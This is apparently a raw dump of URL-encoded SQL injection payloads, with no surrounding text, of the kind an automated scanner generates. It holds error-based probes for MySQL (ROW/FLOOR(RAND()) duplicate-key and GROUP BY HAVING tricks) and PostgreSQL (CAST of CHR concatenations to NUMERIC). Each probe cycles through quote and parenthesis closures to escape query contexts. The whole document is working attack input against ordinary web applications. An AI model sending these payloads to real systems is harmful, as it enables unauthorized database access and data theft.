-4066%22%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22KuNZ%22%3D%22KuNZ -3547%22%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22faGc%22%3D%22faGc -8405%22%29%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22wOLX%22%3D%22wOLX -4668%22%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22FREu%22%3D%22FREu -2565%22%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22xRJl%22%20LIKE%20%22xRJl -6369%22%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22xSOr%22%20LIKE%20%22xSOr -5814%22%29%29%29%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22GKxL%22%20LIKE%20%22GKxL -1087%22%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22Llno%22%20LIKE%20%22Llno -7327%29%20WHERE%203540%3D3540%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -8340%27%29%20WHERE%209947%3D9947%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -5664%27%20WHERE%201590%3D1590%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -4280%22%20WHERE%202633%3D2633%20OR%20ROW%282987%2C1920%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282987%3D2987%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%202987%20UNION%20SELECT%201920%29a%20GROUP%20BY%20x%20LIMIT%201%29 -6968%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9248%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6421%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5721%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4406%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%285274%3D5274 -5418%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%283023%3D3023 -6800%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%289041%3D9041 -1586%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3071%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%27xDFv%27%3D%27xDFv -6958%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%27kqKJ%27%3D%27kqKJ -8297%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%27IvMe%27%3D%27IvMe -6090%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%27EUkx%27%3D%27EUkx -2729%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%27uuBb%27%20LIKE%20%27uuBb -5531%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%27vWjv%27%20LIKE%20%27vWjv -3609%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%27auOX%27%20LIKE%20%27auOX -5529%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%27iRhV%27%20LIKE%20%27iRhV -8986%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%22IYHq%22%3D%22IYHq -4188%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%22nCFu%22%3D%22nCFu -3244%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%22uQCm%22%3D%22uQCm -5546%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%22NPhm%22%3D%22NPhm -1700%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%22Xtuf%22%20LIKE%20%22Xtuf -8243%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%22rTnH%22%20LIKE%20%22rTnH -1685%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%22yfSm%22%20LIKE%20%22yfSm -9467%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%22cVHP%22%20LIKE%20%22cVHP -8816%29%20WHERE%208893%3D8893%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4622%27%29%20WHERE%206661%3D6661%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5812%27%20WHERE%201070%3D1070%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2707%22%20WHERE%207985%3D7985%20OR%201%20GROUP%20BY%20CONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283771%3D3771%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2652%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -3225%27%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -9795%27%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -8854%22%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -5407%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%288880%3D8880 -9936%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%288967%3D8967 -1548%29%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%289929%3D9929 -1752%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -8627%27%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27jCXh%27%3D%27jCXh -7648%27%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27mars%27%3D%27mars -3733%27%29%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27rPwm%27%3D%27rPwm -8100%27%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27NajH%27%3D%27NajH -4899%27%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27RuOp%27%20LIKE%20%27RuOp -1965%27%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27rKcg%27%20LIKE%20%27rKcg -7203%27%29%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27IOlq%27%20LIKE%20%27IOlq -5571%27%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27lZEF%27%20LIKE%20%27lZEF -6252%22%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22Sbri%22%3D%22Sbri -5396%22%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22RHlW%22%3D%22RHlW -2715%22%29%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22hFBO%22%3D%22hFBO -7955%22%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22KEzT%22%3D%22KEzT -7641%22%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22apQm%22%20LIKE%20%22apQm -4678%22%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22nroq%22%20LIKE%20%22nroq -1810%22%29%29%29%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22hkwo%22%20LIKE%20%22hkwo -6658%22%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22dJOg%22%20LIKE%20%22dJOg -6974%29%20WHERE%202377%3D2377%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -5536%27%29%20WHERE%202643%3D2643%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -6431%27%20WHERE%205101%3D5101%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -9360%22%20WHERE%204921%3D4921%20OR%204512%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284512%3D4512%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 